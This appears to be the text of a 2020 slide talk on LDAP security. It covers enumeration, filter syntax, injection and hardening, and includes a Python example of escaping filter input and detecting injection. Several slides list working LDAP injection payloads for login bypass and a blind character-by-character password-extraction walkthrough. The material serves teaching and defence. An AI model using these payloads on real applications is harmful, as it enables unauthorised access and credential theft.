LDAP Security
Emre ÖVÜNÇ
Who am I ?
• Attack Developer – Picus Security
• Security Researcher – Synack
• OSCE – OSCP – OSWP
• LFCE – LFCS – ISO27001 LA
• https://github.com/EmreOvunc
• https://twitter.com/EmreOvunc
Lightweight Directory Access Protocol
• TCP/IP
• Client – Server
• X.500 Protocol (1988-1993) | OSI
What is LDAP ?
• Protocol
• Database
  • Organizations
  • Units
  • People
  • Resources
  • Devices
• Authentication mechanism
Aim ?
• Access control
• Privacy
• Security
• Authentication
• User management
• Delegation
• Rights
• Scaling
OpenLDAP
Open-source, free, BSD license
OpenLDAP Components
• Slapd
  • Daemon
  • Receives connections
• Libraries & Utilities
• Client
LDAP Server
Ldap-utils Slapd Phpldapadmin Apache2 Bind9
LDAP Server Configuration
Search Parameters
ldapsearch -H ldap://172.16.155.128 -D "cn=admin,dc=ovunc,dc=local" -W
-H: LDAP Uniform Resource Identifier(s)
-D: bind DN
-W: prompt for bind password
DC: domain component
DN: distinguished name
CN: common name
OU: organizational unit name
UID: user id
LDAP Anonymous Authentication
LDAP Simple Authentication
LDAP Configuration
LDAP Simple Authentication
LDAP Anonymous Authentication
LDAP Configuration
LDAP Anonymous Authentication
Nmap LDAP Enumeration
Nmap LDAP Enumeration
Nmap LDAP Bruteforcing
LDAP Filters
Operator  Description                              Example
=         Exact match                              cn=admin
*         Zero or more characters (wildcard)       ou=*
>=        Greater than or equal                    uid>=
<=        Less than or equal                       uid<=
=*        Attribute present (one or more values)   cn=*
&         And                                      (&(filter)(filter)(filter))
|         Or                                       (|(filter)(filter)(filter))
!         Not                                      (!(filter))
LDAP Filters Example
• (&(objectClass=group)(cn=admin))
• (&(objectClass=posix)(cn=*team*))
• (&(objectClass=inetOrgPerson)(memberOf=cn=Admins,ou=redteam))
LDAP Web Application
<input type="text" name="user" placeholder="Enter the username">
ldap_query = "(cn=" + $user + ")"
run(ldap_query)
???
LDAP Web Login Bypass
• (&(user=*)(password=*))
• (&(user=*))%00
• (&(user=*)(&))(password=*))
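An added example, not code from the slides or from the eLdap tool: the concatenated login filter from the LDAP Web Application slide next to a version that escapes each value as RFC 4515 requires, plus two checks a defender can run on a built filter to spot the bypass payloads listed above. The attribute names uid and userPassword are assumed.

```python
import re

# RFC 4515 section 3: characters that carry meaning inside a filter value.
# Backslash is listed first so the escapes we emit are not escaped again.
_ESCAPES = (("\\", r"\5c"), ("*", r"\2a"), ("(", r"\28"), (")", r"\29"),
            ("\x00", r"\00"))

def escape_filter_value(value: str) -> str:
    """Escape user input so the server treats it as a literal value."""
    for raw, esc in _ESCAPES:
        value = value.replace(raw, esc)
    return value

def build_login_filter_vulnerable(user: str, password: str) -> str:
    """Concatenation as on the slide: the input can rewrite the filter."""
    return "(&(uid=" + user + ")(userPassword=" + password + "))"

def build_login_filter_safe(user: str, password: str) -> str:
    """Same filter shape, but each value is escaped before insertion."""
    return "(&(uid=%s)(userPassword=%s))" % (
        escape_filter_value(user), escape_filter_value(password))

# One attribute assertion: "(attr=", "(attr>=", "(attr<=" or "(attr~=".
_ASSERTION = re.compile(r"\(([A-Za-z][A-Za-z0-9.-]*)(=|>=|<=|~=)")

def count_assertions(ldap_filter: str) -> int:
    """Number of assertions; more than the template has means injection."""
    return len(_ASSERTION.findall(ldap_filter))

def is_single_filter(ldap_filter: str) -> bool:
    """True when the string is one balanced filter with no NUL byte."""
    depth = 0
    for pos, ch in enumerate(ldap_filter):
        if ch == "\x00":          # %00 truncation trick
            return False
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:        # first expression closed: must be the end
                return pos == len(ldap_filter) - 1
    return False

if __name__ == "__main__":
    # Constructed inputs: a bypass value from the slide and a normal one.
    for user in ("*)(userPassword=*", "bob"):
        for builder in (build_login_filter_vulnerable, build_login_filter_safe):
            f = builder(user, "secret")
            print(builder.__name__, f, count_assertions(f), is_single_filter(f))
```

The structural check alone is not enough: a payload that only appends an extra assertion still yields one balanced filter, which is why the assertion count is compared against the template as well.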
LDAP Injection Payloads
**)(&*))%00*()|%26'*()|&'*(|(mail=*))*(|(objectclass=*))*)(uid=*))(|(uid=**/*
LDAP Injection
(&(sn=admin)(password=*))
(&(sn=admin)(password=a*))
(&(sn=admin)(password=b*))
...
(&(sn=admin)(password=m*))
(&(sn=admin)(password=my*))
...
(&(sn=admin)(password=myPassw0rd))
LDAP Injection Question ?
(&(objectClass=[class name])(ou=[unit name]))
(&(objectClass=posix)(ou=redteam))
LDAP Injection Answer
(&(objectClass=[class name])(ou=[unit name]))
(&(objectClass=*)(objectClass=*)(ou=*))
(&(objectClass=*)(objectClass=*))(&(objectClass=foo)(ou=*))
(&(objectClass=*)(objectClass=*))(&(objectClass=people)(ou=redteam))
LDAP Injection Question ?
(&(deviceid=[id])(cn=[device name]))
(&(deviceid=34)(cn=nasbackup))
LDAP Injection Answer
(&(deviceid=[id])(cn=[device name]))
(&(deviceid=34)(ou=a*)(cn=nasbackup))
(&(deviceid=34)(ou=b*)(cn=nasbackup))
...
(&(deviceid=34)(ou=re*)(cn=nasbackup))
...
(&(deviceid=34)(ou=redteam)(cn=nasbackup))
LDAP Hardening
Input validation (ldap queries)
Least privilege (users & devices)
AppArmor & SELinux configurations
LDAPS (secure connection)
Backup (encrypt & sign)
LDAP Server Hardening
Reject requests with:
• No password
• Null password
• Unauthenticated bind
• Anonymous users/sessions
Do not use:
• SHA-1
• LDAPv2
• Weak passwords
CVE-2019-13057
• OpenLDAP before 2.4.48
• Administrator delegation -> rootDN
• Slapd service
• Authorization
• CVSS 4.9 (NVD)
CVE-2019-13565
• OpenLDAP 2.x before 2.4.48
• SASL authentication
• Session encryption
• ACL configuration
• Successful authorization (different user)
• CVSS 7.5 (NVD)
Lab
LDAP Lab Objects
Organization: redteam
Organization Unit: people
Posix Group: nettim
Users: admin, bob
Demo Time
LDAP Tool
• git clone https://github.com/EmreOvunc/eLdap-Ldap-Search-and-Filter.git
• cd eLdap-Ldap-Search-and-Filter
• sudo pip3 install virtualenv
• source myvenv/bin/activate
• python3 manage.py runserver
LDAP Tool Vuln.
LDAP Tool Attack… not yet!
Emre ÖVÜNÇ – 16/04/2020